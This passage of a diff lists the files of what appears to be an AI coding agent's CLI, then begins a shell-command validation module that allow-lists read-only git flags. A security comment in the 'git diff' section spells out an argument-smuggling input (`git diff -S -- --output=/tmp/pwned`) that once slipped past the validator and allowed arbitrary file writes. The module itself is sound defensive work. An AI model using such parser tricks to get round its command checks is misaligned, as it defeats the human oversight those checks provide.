  1555. package/src/utils/hooks/hooksConfigManager.ts +400 -0
  1556. package/src/utils/hooks/hooksConfigSnapshot.ts +133 -0
  1557. package/src/utils/hooks/hooksSettings.ts +271 -0
  1558. package/src/utils/hooks/postSamplingHooks.ts +70 -0
  1559. package/src/utils/hooks/registerFrontmatterHooks.ts +67 -0
  1560. package/src/utils/hooks/registerSkillHooks.ts +64 -0
  1561. package/src/utils/hooks/sessionHooks.ts +447 -0
  1562. package/src/utils/hooks/skillImprovement.ts +267 -0
  1563. package/src/utils/hooks/ssrfGuard.ts +294 -0
  1564. package/src/utils/hooks.ts +5022 -0
  1565. package/src/utils/horizontalScroll.ts +137 -0
  1566. package/src/utils/http.ts +136 -0
  1567. package/src/utils/hyperlink.ts +39 -0
  1568. package/src/utils/iTermBackup.ts +73 -0
  1569. package/src/utils/ide.ts +1494 -0
  1570. package/src/utils/idePathConversion.ts +90 -0
  1571. package/src/utils/idleTimeout.ts +53 -0
  1572. package/src/utils/imagePaste.ts +416 -0
  1573. package/src/utils/imageResizer.ts +880 -0
  1574. package/src/utils/imageStore.ts +167 -0
  1575. package/src/utils/imageValidation.ts +104 -0
  1576. package/src/utils/immediateCommand.ts +15 -0
  1577. package/src/utils/inProcessTeammateHelpers.ts +102 -0
  1578. package/src/utils/ink.ts +26 -0
  1579. package/src/utils/intl.ts +94 -0
  1580. package/src/utils/jetbrains.ts +191 -0
  1581. package/src/utils/json.ts +277 -0
  1582. package/src/utils/jsonRead.ts +16 -0
  1583. package/src/utils/keyboardShortcuts.ts +14 -0
  1584. package/src/utils/lazySchema.ts +8 -0
  1585. package/src/utils/listSessionsImpl.ts +454 -0
  1586. package/src/utils/localInstaller.ts +162 -0
  1587. package/src/utils/lockfile.ts +43 -0
  1588. package/src/utils/log.ts +362 -0
  1589. package/src/utils/logoV2Utils.ts +350 -0
  1590. package/src/utils/mailbox.ts +73 -0
  1591. package/src/utils/managedEnv.ts +199 -0
  1592. package/src/utils/managedEnvConstants.ts +191 -0
  1593. package/src/utils/markdown.ts +381 -0
  1594. package/src/utils/markdownConfigLoader.ts +600 -0
  1595. package/src/utils/mcp/dateTimeParser.ts +121 -0
  1596. package/src/utils/mcp/elicitationValidation.ts +336 -0
  1597. package/src/utils/mcpInstructionsDelta.ts +130 -0
  1598. package/src/utils/mcpOutputStorage.ts +189 -0
  1599. package/src/utils/mcpValidation.ts +208 -0
  1600. package/src/utils/mcpWebSocketTransport.ts +200 -0
  1601. package/src/utils/memoize.ts +269 -0
  1602. package/src/utils/memory/types.ts +12 -0
  1603. package/src/utils/memory/versions.ts +8 -0
  1604. package/src/utils/memoryFileDetection.ts +289 -0
  1605. package/src/utils/messagePredicates.ts +8 -0
  1606. package/src/utils/messageQueueManager.ts +547 -0
  1607. package/src/utils/messages/mappers.ts +290 -0
  1608. package/src/utils/messages/systemInit.ts +96 -0
  1609. package/src/utils/messages.ts +5512 -0
  1610. package/src/utils/model/agent.ts +157 -0
  1611. package/src/utils/model/aliases.ts +25 -0
  1612. package/src/utils/model/antModels.ts +64 -0
  1613. package/src/utils/model/bedrock.ts +265 -0
  1614. package/src/utils/model/check1mAccess.ts +72 -0
  1615. package/src/utils/model/configs.ts +118 -0
  1616. package/src/utils/model/contextWindowUpgradeCheck.ts +47 -0
  1617. package/src/utils/model/deprecation.ts +101 -0
  1618. package/src/utils/model/model.ts +634 -0
  1619. package/src/utils/model/modelAllowlist.ts +170 -0
  1620. package/src/utils/model/modelCapabilities.ts +118 -0
  1621. package/src/utils/model/modelOptions.ts +540 -0
  1622. package/src/utils/model/modelStrings.ts +166 -0
  1623. package/src/utils/model/modelSupportOverrides.ts +50 -0
  1624. package/src/utils/model/providers.ts +46 -0
  1625. package/src/utils/model/validateModel.ts +159 -0
  1626. package/src/utils/modelCost.ts +235 -0
  1627. package/src/utils/modifiers.ts +36 -0
  1628. package/src/utils/mtls.ts +179 -0
  1629. package/src/utils/nativeInstaller/download.ts +523 -0
  1630. package/src/utils/nativeInstaller/index.ts +18 -0
  1631. package/src/utils/nativeInstaller/installer.ts +1708 -0
  1632. package/src/utils/nativeInstaller/packageManagers.ts +336 -0
  1633. package/src/utils/nativeInstaller/pidLock.ts +433 -0
  1634. package/src/utils/notebook.ts +224 -0
  1635. package/src/utils/objectGroupBy.ts +18 -0
  1636. package/src/utils/pasteStore.ts +104 -0
  1637. package/src/utils/path.ts +155 -0
  1638. package/src/utils/pdf.ts +300 -0
  1639. package/src/utils/pdfUtils.ts +70 -0
  1640. package/src/utils/peerAddress.ts +21 -0
  1641. package/src/utils/permissions/PermissionMode.ts +141 -0
  1642. package/src/utils/permissions/PermissionPromptToolResultSchema.ts +127 -0
  1643. package/src/utils/permissions/PermissionResult.ts +35 -0
  1644. package/src/utils/permissions/PermissionRule.ts +40 -0
  1645. package/src/utils/permissions/PermissionUpdate.ts +389 -0
  1646. package/src/utils/permissions/PermissionUpdateSchema.ts +78 -0
  1647. package/src/utils/permissions/autoModeState.ts +39 -0
  1648. package/src/utils/permissions/bashClassifier.ts +61 -0
  1649. package/src/utils/permissions/bypassPermissionsKillswitch.ts +155 -0
  1650. package/src/utils/permissions/classifierDecision.ts +98 -0
  1651. package/src/utils/permissions/classifierShared.ts +39 -0
  1652. package/src/utils/permissions/dangerousPatterns.ts +80 -0
  1653. package/src/utils/permissions/denialTracking.ts +45 -0
  1654. package/src/utils/permissions/filesystem.ts +1777 -0
  1655. package/src/utils/permissions/getNextPermissionMode.ts +101 -0
  1656. package/src/utils/permissions/pathValidation.ts +485 -0
  1657. package/src/utils/permissions/permissionExplainer.ts +250 -0
  1658. package/src/utils/permissions/permissionRuleParser.ts +198 -0
  1659. package/src/utils/permissions/permissionSetup.ts +1532 -0
  1660. package/src/utils/permissions/permissions.ts +1486 -0
  1661. package/src/utils/permissions/permissionsLoader.ts +296 -0
  1662. package/src/utils/permissions/shadowedRuleDetection.ts +234 -0
  1663. package/src/utils/permissions/shellRuleMatching.ts +228 -0
  1664. package/src/utils/permissions/yoloClassifier.ts +1495 -0
  1665. package/src/utils/planModeV2.ts +95 -0
  1666. package/src/utils/plans.ts +397 -0
  1667. package/src/utils/platform.ts +150 -0
  1668. package/src/utils/plugins/addDirPluginSettings.ts +71 -0
  1669. package/src/utils/plugins/cacheUtils.ts +196 -0
  1670. package/src/utils/plugins/dependencyResolver.ts +305 -0
  1671. package/src/utils/plugins/fetchTelemetry.ts +135 -0
  1672. package/src/utils/plugins/gitAvailability.ts +69 -0
  1673. package/src/utils/plugins/headlessPluginInstall.ts +174 -0
  1674. package/src/utils/plugins/hintRecommendation.ts +164 -0
  1675. package/src/utils/plugins/installCounts.ts +292 -0
  1676. package/src/utils/plugins/installedPluginsManager.ts +1268 -0
  1677. package/src/utils/plugins/loadPluginAgents.ts +348 -0
  1678. package/src/utils/plugins/loadPluginCommands.ts +946 -0
  1679. package/src/utils/plugins/loadPluginHooks.ts +287 -0
  1680. package/src/utils/plugins/loadPluginOutputStyles.ts +178 -0
  1681. package/src/utils/plugins/lspPluginIntegration.ts +387 -0
  1682. package/src/utils/plugins/lspRecommendation.ts +374 -0
  1683. package/src/utils/plugins/managedPlugins.ts +27 -0
  1684. package/src/utils/plugins/marketplaceHelpers.ts +592 -0
  1685. package/src/utils/plugins/marketplaceManager.ts +2643 -0
  1686. package/src/utils/plugins/mcpPluginIntegration.ts +634 -0
  1687. package/src/utils/plugins/mcpbHandler.ts +968 -0
  1688. package/src/utils/plugins/officialMarketplace.ts +25 -0
  1689. package/src/utils/plugins/officialMarketplaceGcs.ts +216 -0
  1690. package/src/utils/plugins/officialMarketplaceStartupCheck.ts +439 -0
  1691. package/src/utils/plugins/orphanedPluginFilter.ts +114 -0
  1692. package/src/utils/plugins/parseMarketplaceInput.ts +162 -0
  1693. package/src/utils/plugins/performStartupChecks.tsx +70 -0
  1694. package/src/utils/plugins/pluginAutoupdate.ts +284 -0
  1695. package/src/utils/plugins/pluginBlocklist.ts +127 -0
  1696. package/src/utils/plugins/pluginDirectories.ts +178 -0
  1697. package/src/utils/plugins/pluginFlagging.ts +208 -0
  1698. package/src/utils/plugins/pluginIdentifier.ts +123 -0
  1699. package/src/utils/plugins/pluginInstallationHelpers.ts +595 -0
  1700. package/src/utils/plugins/pluginLoader.ts +3302 -0
  1701. package/src/utils/plugins/pluginOptionsStorage.ts +400 -0
  1702. package/src/utils/plugins/pluginPolicy.ts +20 -0
  1703. package/src/utils/plugins/pluginStartupCheck.ts +341 -0
  1704. package/src/utils/plugins/pluginVersioning.ts +157 -0
  1705. package/src/utils/plugins/reconciler.ts +265 -0
  1706. package/src/utils/plugins/refresh.ts +215 -0
  1707. package/src/utils/plugins/schemas.ts +1681 -0
  1708. package/src/utils/plugins/validatePlugin.ts +903 -0
  1709. package/src/utils/plugins/walkPluginMarkdown.ts +69 -0
  1710. package/src/utils/plugins/zipCache.ts +406 -0
  1711. package/src/utils/plugins/zipCacheAdapters.ts +164 -0
  1712. package/src/utils/powershell/dangerousCmdlets.ts +185 -0
  1713. package/src/utils/powershell/parser.ts +1804 -0
  1714. package/src/utils/powershell/staticPrefix.ts +316 -0
  1715. package/src/utils/preflightChecks.tsx +151 -0
  1716. package/src/utils/privacyLevel.ts +55 -0
  1717. package/src/utils/process.ts +68 -0
  1718. package/src/utils/processUserInput/processBashCommand.tsx +140 -0
  1719. package/src/utils/processUserInput/processSlashCommand.tsx +922 -0
  1720. package/src/utils/processUserInput/processTextPrompt.ts +100 -0
  1721. package/src/utils/processUserInput/processUserInput.ts +605 -0
  1722. package/src/utils/profilerBase.ts +46 -0
  1723. package/src/utils/promptCategory.ts +49 -0
  1724. package/src/utils/promptEditor.ts +188 -0
  1725. package/src/utils/promptShellExecution.ts +183 -0
  1726. package/src/utils/proxy.ts +426 -0
  1727. package/src/utils/queryContext.ts +179 -0
  1728. package/src/utils/queryHelpers.ts +552 -0
  1729. package/src/utils/queryProfiler.ts +301 -0
  1730. package/src/utils/queueProcessor.ts +95 -0
  1731. package/src/utils/readEditContext.ts +227 -0
  1732. package/src/utils/readFileInRange.ts +383 -0
  1733. package/src/utils/releaseNotes.ts +360 -0
  1734. package/src/utils/renderOptions.ts +77 -0
  1735. package/src/utils/ripgrep.ts +679 -0
  1736. package/src/utils/sandbox/sandbox-adapter.ts +985 -0
  1737. package/src/utils/sandbox/sandbox-ui-utils.ts +12 -0
  1738. package/src/utils/sanitization.ts +91 -0
  1739. package/src/utils/screenshotClipboard.ts +121 -0
  1740. package/src/utils/sdkEventQueue.ts +134 -0
  1741. package/src/utils/secureStorage/fallbackStorage.ts +70 -0
  1742. package/src/utils/secureStorage/index.ts +17 -0
  1743. package/src/utils/secureStorage/keychainPrefetch.ts +116 -0
  1744. package/src/utils/secureStorage/macOsKeychainHelpers.ts +111 -0
  1745. package/src/utils/secureStorage/macOsKeychainStorage.ts +231 -0
  1746. package/src/utils/secureStorage/plainTextStorage.ts +84 -0
  1747. package/src/utils/semanticBoolean.ts +29 -0
  1748. package/src/utils/semanticNumber.ts +36 -0
  1749. package/src/utils/semver.ts +59 -0
  1750. package/src/utils/sequential.ts +56 -0
  1751. package/src/utils/sessionActivity.ts +133 -0
  1752. package/src/utils/sessionEnvVars.ts +22 -0
  1753. package/src/utils/sessionEnvironment.ts +166 -0
  1754. package/src/utils/sessionFileAccessHooks.ts +250 -0
  1755. package/src/utils/sessionIngressAuth.ts +140 -0
  1756. package/src/utils/sessionRestore.ts +551 -0
  1757. package/src/utils/sessionStart.ts +232 -0
  1758. package/src/utils/sessionState.ts +150 -0
  1759. package/src/utils/sessionStorage.ts +5105 -0
  1760. package/src/utils/sessionStoragePortable.ts +793 -0
  1761. package/src/utils/sessionTitle.ts +129 -0
  1762. package/src/utils/sessionUrl.ts +64 -0
  1763. package/src/utils/set.ts +53 -0
  1764. package/src/utils/settings/allErrors.ts +32 -0
  1765. package/src/utils/settings/applySettingsChange.ts +92 -0
  1766. package/src/utils/settings/changeDetector.ts +488 -0
  1767. package/src/utils/settings/constants.ts +202 -0
  1768. package/src/utils/settings/internalWrites.ts +37 -0
  1769. package/src/utils/settings/managedPath.ts +34 -0
  1770. package/src/utils/settings/mdm/constants.ts +81 -0
  1771. package/src/utils/settings/mdm/rawRead.ts +130 -0
  1772. package/src/utils/settings/mdm/settings.ts +316 -0
  1773. package/src/utils/settings/permissionValidation.ts +262 -0
  1774. package/src/utils/settings/pluginOnlyPolicy.ts +60 -0
  1775. package/src/utils/settings/schemaOutput.ts +8 -0
  1776. package/src/utils/settings/settings.ts +1015 -0
  1777. package/src/utils/settings/settingsCache.ts +80 -0
  1778. package/src/utils/settings/toolValidationConfig.ts +103 -0
  1779. package/src/utils/settings/types.ts +1148 -0
  1780. package/src/utils/settings/validateEditTool.ts +45 -0
  1781. package/src/utils/settings/validation.ts +265 -0
  1782. package/src/utils/settings/validationTips.ts +164 -0
  1783. package/src/utils/shell/bashProvider.ts +255 -0
  1784. package/src/utils/shell/outputLimits.ts +14 -0
  1785. package/src/utils/shell/powershellDetection.ts +107 -0
  1786. package/src/utils/shell/powershellProvider.ts +123 -0
  1787. package/src/utils/shell/prefix.ts +367 -0
  1788. package/src/utils/shell/readOnlyCommandValidation.ts +1893 -0
  1789. package/src/utils/shell/resolveDefaultShell.ts +14 -0
  1790. package/src/utils/shell/shellProvider.ts +33 -0
  1791. package/src/utils/shell/shellToolUtils.ts +22 -0
  1792. package/src/utils/shell/specPrefix.ts +241 -0
  1793. package/src/utils/shellConfig.ts +167 -0
  1794. package/src/utils/sideQuery.ts +222 -0
  1795. package/src/utils/sideQuestion.ts +155 -0
  1796. package/src/utils/signal.ts +43 -0
  1797. package/src/utils/sinks.ts +16 -0
  1798. package/src/utils/skills/skillChangeDetector.ts +311 -0
  1799. package/src/utils/slashCommandParsing.ts +60 -0
  1800. package/src/utils/sleep.ts +84 -0
  1801. package/src/utils/sliceAnsi.ts +91 -0
  1802. package/src/utils/slowOperations.ts +286 -0
  1803. package/src/utils/standaloneAgent.ts +23 -0
  1804. package/src/utils/startupProfiler.ts +194 -0
  1805. package/src/utils/staticRender.tsx +116 -0
  1806. package/src/utils/stats.ts +1061 -0
  1807. package/src/utils/statsCache.ts +434 -0
  1808. package/src/utils/status.tsx +362 -0
  1809. package/src/utils/statusNoticeDefinitions.tsx +198 -0
  1810. package/src/utils/statusNoticeHelpers.ts +20 -0
  1811. package/src/utils/stream.ts +76 -0
  1812. package/src/utils/streamJsonStdoutGuard.ts +123 -0
  1813. package/src/utils/streamlinedTransform.ts +201 -0
  1814. package/src/utils/stringUtils.ts +235 -0
  1815. package/src/utils/subprocessEnv.ts +99 -0
  1816. package/src/utils/suggestions/commandSuggestions.ts +567 -0
  1817. package/src/utils/suggestions/directoryCompletion.ts +263 -0
  1818. package/src/utils/suggestions/shellHistoryCompletion.ts +119 -0
  1819. package/src/utils/suggestions/skillUsageTracking.ts +55 -0
  1820. package/src/utils/suggestions/slackChannelSuggestions.ts +209 -0
  1821. package/src/utils/swarm/It2SetupPrompt.tsx +380 -0
  1822. package/src/utils/swarm/backends/ITermBackend.ts +370 -0
  1823. package/src/utils/swarm/backends/InProcessBackend.ts +339 -0
  1824. package/src/utils/swarm/backends/PaneBackendExecutor.ts +354 -0
  1825. package/src/utils/swarm/backends/TmuxBackend.ts +764 -0
  1826. package/src/utils/swarm/backends/detection.ts +128 -0
  1827. package/src/utils/swarm/backends/it2Setup.ts +245 -0
  1828. package/src/utils/swarm/backends/registry.ts +464 -0
  1829. package/src/utils/swarm/backends/teammateModeSnapshot.ts +87 -0
  1830. package/src/utils/swarm/backends/types.ts +311 -0
  1831. package/src/utils/swarm/constants.ts +33 -0
  1832. package/src/utils/swarm/inProcessRunner.ts +1552 -0
  1833. package/src/utils/swarm/leaderPermissionBridge.ts +54 -0
  1834. package/src/utils/swarm/permissionSync.ts +928 -0
  1835. package/src/utils/swarm/reconnection.ts +119 -0
  1836. package/src/utils/swarm/spawnInProcess.ts +328 -0
  1837. package/src/utils/swarm/spawnUtils.ts +146 -0
  1838. package/src/utils/swarm/teamHelpers.ts +683 -0
  1839. package/src/utils/swarm/teammateInit.ts +129 -0
  1840. package/src/utils/swarm/teammateLayoutManager.ts +107 -0
  1841. package/src/utils/swarm/teammateModel.ts +10 -0
  1842. package/src/utils/swarm/teammatePromptAddendum.ts +18 -0
  1843. package/src/utils/systemDirectories.ts +74 -0
  1844. package/src/utils/systemPrompt.ts +123 -0
  1845. package/src/utils/systemPromptType.ts +14 -0
  1846. package/src/utils/systemTheme.ts +119 -0
  1847. package/src/utils/taggedId.ts +54 -0
  1848. package/src/utils/task/TaskOutput.ts +390 -0
  1849. package/src/utils/task/diskOutput.ts +451 -0
  1850. package/src/utils/task/framework.ts +308 -0
  1851. package/src/utils/task/outputFormatting.ts +38 -0
  1852. package/src/utils/task/sdkProgress.ts +36 -0
  1853. package/src/utils/tasks.ts +862 -0
  1854. package/src/utils/teamDiscovery.ts +81 -0
  1855. package/src/utils/teamMemoryOps.ts +88 -0
  1856. package/src/utils/teammate.ts +292 -0
  1857. package/src/utils/teammateContext.ts +96 -0
  1858. package/src/utils/teammateMailbox.ts +1183 -0
  1859. package/src/utils/telemetry/betaSessionTracing.ts +491 -0
  1860. package/src/utils/telemetry/bigqueryExporter.ts +252 -0
  1861. package/src/utils/telemetry/events.ts +75 -0
  1862. package/src/utils/telemetry/instrumentation.ts +825 -0
  1863. package/src/utils/telemetry/logger.ts +26 -0
  1864. package/src/utils/telemetry/perfettoTracing.ts +1120 -0
  1865. package/src/utils/telemetry/pluginTelemetry.ts +289 -0
  1866. package/src/utils/telemetry/sessionTracing.ts +927 -0
  1867. package/src/utils/telemetry/skillLoadedEvent.ts +39 -0
  1868. package/src/utils/telemetryAttributes.ts +71 -0
  1869. package/src/utils/teleport/api.ts +466 -0
  1870. package/src/utils/teleport/environmentSelection.ts +77 -0
  1871. package/src/utils/teleport/environments.ts +120 -0
  1872. package/src/utils/teleport/gitBundle.ts +292 -0
  1873. package/src/utils/teleport.tsx +1226 -0
  1874. package/src/utils/tempfile.ts +31 -0
  1875. package/src/utils/terminal.ts +131 -0
  1876. package/src/utils/terminalPanel.ts +191 -0
  1877. package/src/utils/textHighlighting.ts +166 -0
  1878. package/src/utils/theme.ts +639 -0
  1879. package/src/utils/thinking.ts +162 -0
  1880. package/src/utils/timeouts.ts +39 -0
  1881. package/src/utils/tmuxSocket.ts +427 -0
  1882. package/src/utils/todo/types.ts +18 -0
  1883. package/src/utils/tokenBudget.ts +73 -0
  1884. package/src/utils/tokens.ts +261 -0
  1885. package/src/utils/toolErrors.ts +132 -0
  1886. package/src/utils/toolPool.ts +79 -0
  1887. package/src/utils/toolResultStorage.ts +1040 -0
  1888. package/src/utils/toolSchemaCache.ts +26 -0
  1889. package/src/utils/toolSearch.ts +756 -0
  1890. package/src/utils/transcriptSearch.ts +202 -0
  1891. package/src/utils/treeify.ts +170 -0
  1892. package/src/utils/truncate.ts +179 -0
  1893. package/src/utils/ultraplan/ccrSession.ts +349 -0
  1894. package/src/utils/ultraplan/keyword.ts +127 -0
  1895. package/src/utils/ultraplan/prompt.txt +1 -0
  1896. package/src/utils/unaryLogging.ts +39 -0
  1897. package/src/utils/undercover.ts +89 -0
  1898. package/src/utils/user.ts +194 -0
  1899. package/src/utils/userAgent.ts +10 -0
  1900. package/src/utils/userPromptKeywords.ts +27 -0
  1901. package/src/utils/uuid.ts +27 -0
  1902. package/src/utils/warningHandler.ts +121 -0
  1903. package/src/utils/which.ts +82 -0
  1904. package/src/utils/windowsPaths.ts +173 -0
  1905. package/src/utils/withResolvers.ts +13 -0
  1906. package/src/utils/words.ts +800 -0
  1907. package/src/utils/workloadContext.ts +57 -0
  1908. package/src/utils/worktree.ts +1519 -0
  1909. package/src/utils/worktreeModeEnabled.ts +11 -0
  1910. package/src/utils/xdg.ts +65 -0
  1911. package/src/utils/xml.ts +16 -0
  1912. package/src/utils/yaml.ts +15 -0
  1913. package/src/utils/zodToJsonSchema.ts +23 -0
  1914. package/src/vim/motions.ts +82 -0
  1915. package/src/vim/operators.ts +556 -0
  1916. package/src/vim/textObjects.ts +186 -0
  1917. package/src/vim/transitions.ts +490 -0
  1918. package/src/vim/types.ts +199 -0
  1919. package/src/voice/voiceModeEnabled.ts +54 -0
  1920. package/start.js +1 -0
@@ -0,0 +1,1893 @@
1
+ /**
2
+ * Shared command validation maps for shell tools (BashTool, PowerShellTool, etc.).
3
+ *
4
+ * Exports complete command configuration maps that any shell tool can import:
5
+ * - GIT_READ_ONLY_COMMANDS: all git subcommands with safe flags and callbacks
6
+ * - GH_READ_ONLY_COMMANDS: ant-only gh CLI commands (network-dependent)
7
+ * - EXTERNAL_READONLY_COMMANDS: cross-shell commands that work in both bash and PowerShell
8
+ * - containsVulnerableUncPath: UNC path detection for credential leak prevention
9
+ * - outputLimits are in outputLimits.ts
10
+ */
11
+
12
+ import { getPlatform } from '../platform.js'
13
+
14
+ // ---------------------------------------------------------------------------
15
+ // Types
16
+ // ---------------------------------------------------------------------------
17
+
18
+ export type FlagArgType =
19
+ | 'none' // No argument (--color, -n)
20
+ | 'number' // Integer argument (--context=3)
21
+ | 'string' // Any string argument (--relative=path)
22
+ | 'char' // Single character (delimiter)
23
+ | '{}' // Literal "{}" only
24
+ | 'EOF' // Literal "EOF" only
25
+
26
+ export type ExternalCommandConfig = {
27
+ safeFlags: Record<string, FlagArgType>
28
+ // Returns true if the command is dangerous, false if safe.
29
+ // args is the list of tokens AFTER the command name (e.g., after "git branch").
30
+ additionalCommandIsDangerousCallback?: (
31
+ rawCommand: string,
32
+ args: string[],
33
+ ) => boolean
34
+ // When false, the tool does NOT respect POSIX `--` end-of-options.
35
+ // validateFlags will continue checking flags after `--` instead of breaking.
36
+ // Default: true (most tools respect `--`).
37
+ respectsDoubleDash?: boolean
38
+ }
39
+
40
+ // ---------------------------------------------------------------------------
41
+ // Shared git flag groups
42
+ // ---------------------------------------------------------------------------
43
+
44
+ const GIT_REF_SELECTION_FLAGS: Record<string, FlagArgType> = {
45
+ '--all': 'none',
46
+ '--branches': 'none',
47
+ '--tags': 'none',
48
+ '--remotes': 'none',
49
+ }
50
+
51
+ const GIT_DATE_FILTER_FLAGS: Record<string, FlagArgType> = {
52
+ '--since': 'string',
53
+ '--after': 'string',
54
+ '--until': 'string',
55
+ '--before': 'string',
56
+ }
57
+
58
+ const GIT_LOG_DISPLAY_FLAGS: Record<string, FlagArgType> = {
59
+ '--oneline': 'none',
60
+ '--graph': 'none',
61
+ '--decorate': 'none',
62
+ '--no-decorate': 'none',
63
+ '--date': 'string',
64
+ '--relative-date': 'none',
65
+ }
66
+
67
+ const GIT_COUNT_FLAGS: Record<string, FlagArgType> = {
68
+ '--max-count': 'number',
69
+ '-n': 'number',
70
+ }
71
+
72
+ // Stat output flags - used in git log, show, diff
73
+ const GIT_STAT_FLAGS: Record<string, FlagArgType> = {
74
+ '--stat': 'none',
75
+ '--numstat': 'none',
76
+ '--shortstat': 'none',
77
+ '--name-only': 'none',
78
+ '--name-status': 'none',
79
+ }
80
+
81
+ // Color output flags - used in git log, show, diff
82
+ const GIT_COLOR_FLAGS: Record<string, FlagArgType> = {
83
+ '--color': 'none',
84
+ '--no-color': 'none',
85
+ }
86
+
87
+ // Patch display flags - used in git log, show
88
+ const GIT_PATCH_FLAGS: Record<string, FlagArgType> = {
89
+ '--patch': 'none',
90
+ '-p': 'none',
91
+ '--no-patch': 'none',
92
+ '--no-ext-diff': 'none',
93
+ '-s': 'none',
94
+ }
95
+
96
+ // Author/committer filter flags - used in git log, reflog
97
+ const GIT_AUTHOR_FILTER_FLAGS: Record<string, FlagArgType> = {
98
+ '--author': 'string',
99
+ '--committer': 'string',
100
+ '--grep': 'string',
101
+ }
102
+
103
+ // ---------------------------------------------------------------------------
104
+ // GIT_READ_ONLY_COMMANDS — complete map of all git subcommands
105
+ // ---------------------------------------------------------------------------
106
+
107
+ export const GIT_READ_ONLY_COMMANDS: Record<string, ExternalCommandConfig> = {
108
+ 'git diff': {
109
+ safeFlags: {
110
+ ...GIT_STAT_FLAGS,
111
+ ...GIT_COLOR_FLAGS,
112
+ // Display and comparison flags
113
+ '--dirstat': 'none',
114
+ '--summary': 'none',
115
+ '--patch-with-stat': 'none',
116
+ '--word-diff': 'none',
117
+ '--word-diff-regex': 'string',
118
+ '--color-words': 'none',
119
+ '--no-renames': 'none',
120
+ '--no-ext-diff': 'none',
121
+ '--check': 'none',
122
+ '--ws-error-highlight': 'string',
123
+ '--full-index': 'none',
124
+ '--binary': 'none',
125
+ '--abbrev': 'number',
126
+ '--break-rewrites': 'none',
127
+ '--find-renames': 'none',
128
+ '--find-copies': 'none',
129
+ '--find-copies-harder': 'none',
130
+ '--irreversible-delete': 'none',
131
+ '--diff-algorithm': 'string',
132
+ '--histogram': 'none',
133
+ '--patience': 'none',
134
+ '--minimal': 'none',
135
+ '--ignore-space-at-eol': 'none',
136
+ '--ignore-space-change': 'none',
137
+ '--ignore-all-space': 'none',
138
+ '--ignore-blank-lines': 'none',
139
+ '--inter-hunk-context': 'number',
140
+ '--function-context': 'none',
141
+ '--exit-code': 'none',
142
+ '--quiet': 'none',
143
+ '--cached': 'none',
144
+ '--staged': 'none',
145
+ '--pickaxe-regex': 'none',
146
+ '--pickaxe-all': 'none',
147
+ '--no-index': 'none',
148
+ '--relative': 'string',
149
+ // Diff filtering
150
+ '--diff-filter': 'string',
151
+ // Short flags
152
+ '-p': 'none',
153
+ '-u': 'none',
154
+ '-s': 'none',
155
+ '-M': 'none',
156
+ '-C': 'none',
157
+ '-B': 'none',
158
+ '-D': 'none',
159
+ '-l': 'none',
160
+ // SECURITY: -S/-G/-O take REQUIRED string arguments (pickaxe search,
161
+ // pickaxe regex, orderfile). Previously 'none' caused a parser
162
+ // differential with git: `git diff -S -- --output=/tmp/pwned` —
163
+ // validator sees -S as no-arg → advances 1 token → breaks on `--` →
164
+ // --output unchecked. git sees -S requires arg → consumes `--` as the
165
+ // pickaxe string (standard getopt: required-arg options consume next
166
+ // argv unconditionally, BEFORE the top-level `--` check) → cursor at
167
+ // --output=... → parses as long option → ARBITRARY FILE WRITE.
168
+ // git log config at line ~207 correctly has -S/-G as 'string'.
169
+ '-S': 'string',
170
+ '-G': 'string',
171
+ '-O': 'string',
172
+ '-R': 'none',
173
+ },
174
+ },
175
+ 'git log': {
176
+ safeFlags: {
177
+ ...GIT_LOG_DISPLAY_FLAGS,
178
+ ...GIT_REF_SELECTION_FLAGS,
179
+ ...GIT_DATE_FILTER_FLAGS,
180
+ ...GIT_COUNT_FLAGS,
181
+ ...GIT_STAT_FLAGS,
182
+ ...GIT_COLOR_FLAGS,
183
+ ...GIT_PATCH_FLAGS,
184
+ ...GIT_AUTHOR_FILTER_FLAGS,
185
+ // Additional display flags
186
+ '--abbrev-commit': 'none',
187
+ '--full-history': 'none',
188
+ '--dense': 'none',
189
+ '--sparse': 'none',
190
+ '--simplify-merges': 'none',
191
+ '--ancestry-path': 'none',
192
+ '--source': 'none',
193
+ '--first-parent': 'none',
194
+ '--merges': 'none',
195
+ '--no-merges': 'none',
196
+ '--reverse': 'none',
197
+ '--walk-reflogs': 'none',
198
+ '--skip': 'number',
199
+ '--max-age': 'number',
200
+ '--min-age': 'number',
201
+ '--no-min-parents': 'none',
202
+ '--no-max-parents': 'none',
203
+ '--follow': 'none',
204
+ // Commit traversal flags
205
+ '--no-walk': 'none',
206
+ '--left-right': 'none',
207
+ '--cherry-mark': 'none',
208
+ '--cherry-pick': 'none',
209
+ '--boundary': 'none',
210
+ // Ordering flags
211
+ '--topo-order': 'none',
212
+ '--date-order': 'none',
213
+ '--author-date-order': 'none',
214
+ // Format control
215
+ '--pretty': 'string',
216
+ '--format': 'string',
217
+ // Diff filtering
218
+ '--diff-filter': 'string',
219
+ // Pickaxe search (find commits that add/remove string)
220
+ '-S': 'string',
221
+ '-G': 'string',
222
+ '--pickaxe-regex': 'none',
223
+ '--pickaxe-all': 'none',
224
+ },
225
+ },
226
+ 'git show': {
227
+ safeFlags: {
228
+ ...GIT_LOG_DISPLAY_FLAGS,
229
+ ...GIT_STAT_FLAGS,
230
+ ...GIT_COLOR_FLAGS,
231
+ ...GIT_PATCH_FLAGS,
232
+ // Additional display flags
233
+ '--abbrev-commit': 'none',
234
+ '--word-diff': 'none',
235
+ '--word-diff-regex': 'string',
236
+ '--color-words': 'none',
237
+ '--pretty': 'string',
238
+ '--format': 'string',
239
+ '--first-parent': 'none',
240
+ '--raw': 'none',
241
+ // Diff filtering
242
+ '--diff-filter': 'string',
243
+ // Short flags
244
+ '-m': 'none',
245
+ '--quiet': 'none',
246
+ },
247
+ },
248
+ 'git shortlog': {
249
+ safeFlags: {
250
+ ...GIT_REF_SELECTION_FLAGS,
251
+ ...GIT_DATE_FILTER_FLAGS,
252
+ // Summary options
253
+ '-s': 'none',
254
+ '--summary': 'none',
255
+ '-n': 'none',
256
+ '--numbered': 'none',
257
+ '-e': 'none',
258
+ '--email': 'none',
259
+ '-c': 'none',
260
+ '--committer': 'none',
261
+ // Grouping
262
+ '--group': 'string',
263
+ // Formatting
264
+ '--format': 'string',
265
+ // Filtering
266
+ '--no-merges': 'none',
267
+ '--author': 'string',
268
+ },
269
+ },
270
+ 'git reflog': {
271
+ safeFlags: {
272
+ ...GIT_LOG_DISPLAY_FLAGS,
273
+ ...GIT_REF_SELECTION_FLAGS,
274
+ ...GIT_DATE_FILTER_FLAGS,
275
+ ...GIT_COUNT_FLAGS,
276
+ ...GIT_AUTHOR_FILTER_FLAGS,
277
+ },
278
+ // SECURITY: Block `git reflog expire` (positional subcommand) — it writes
279
